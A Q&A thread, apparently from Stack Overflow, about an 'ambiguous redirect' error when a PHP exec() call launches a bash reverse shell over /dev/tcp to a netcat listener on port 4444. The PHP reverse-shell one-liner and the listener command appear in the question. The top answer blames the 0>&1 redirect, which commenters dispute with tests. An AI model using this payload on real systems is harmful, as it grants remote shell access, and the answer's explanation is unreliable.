# bash: 1");: ambiguous redirect on my nc listener

Tags: bash, command-line-interface, netcat

I have a netcat listener running on port 4444 like
`nc -nlvp 4444`

I have php code I'm invoking:

```
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/xx.xx.x.xx/4444 0>&1'");?>
```

However, when I invoke this php code, I get the following on the netcat listener:

```
listening on [any] 4444 ...
connect to [xx.xx.x.xx] from (UNKNOWN) [xx.xx.x.xx] 59914
bash: 1");: ambiguous redirect
```

What is causing this?

Thanks

Comment: This works for me as written (except for using a real IP address) on macOS 10.12, with PHP 5.6.30 and bash 3.2.57. Are you sure the script is *exactly* as given above? It looks to me like you may have a problem with quoting; maybe you have something like "smart" quotes or HTML entities instead of actual ASCII quotes?

Answer (score 2):

The error means exactly what it says — you have a redirect that is ambiguous.

> "unclear or inexact because a choice between alternatives has not been
>   made."

```
0>&1
```

Your command takes file descriptor `0` (stdin) and redirects to file descriptor `1` (stdout), which is seemingly meaningless without another descriptor behind it.

Here's an example which illustrates the ambiguity:

```
bash -c 'ls >& $(echo "testing") 0>&1'
```

Which is the same as:

```
bash -c 'ls >& $(echo "testing")'
```

Although adding another descriptor behind the redirect:

```
bash -c 'ls >& $(echo "testing") 0>&1 *'
```

The output file excludes itself when the descriptor doesn't already exist.

↳ [Bash Reference Manual: Redirections - GNU.org](https://www.gnu.org/software/bash/manual/html_node/Redirections.html)

Comment: I don't think this is correct -- when I run `/bin/bash -c 'bash -i >& /dev/tcp/1.1.1.1/4444 0>&1'` bash parses the redirects just fine (but gives a timeout error, because 1.1.1.1 doesn't respond). The error message in the question seems to indicate it's including part of the php syntax in the redirect -- it says `1");` is ambiguous, and the `");` part shouldn't be being passed to bash at all. So I think something weirder is going on.

Comment: @GordonDavisson: Yes, that could be the case. I wasn't able to test the behavior as you did, although I still think the `0>&1` redirection isn't doing anything useful here. Were you able to test it without that, and did it have the same behavior?

Comment: I haven't been able to reproduce the error with any variant I've thought of. I *think* there's something weird with the quoting at the php level, but I'm not sure what.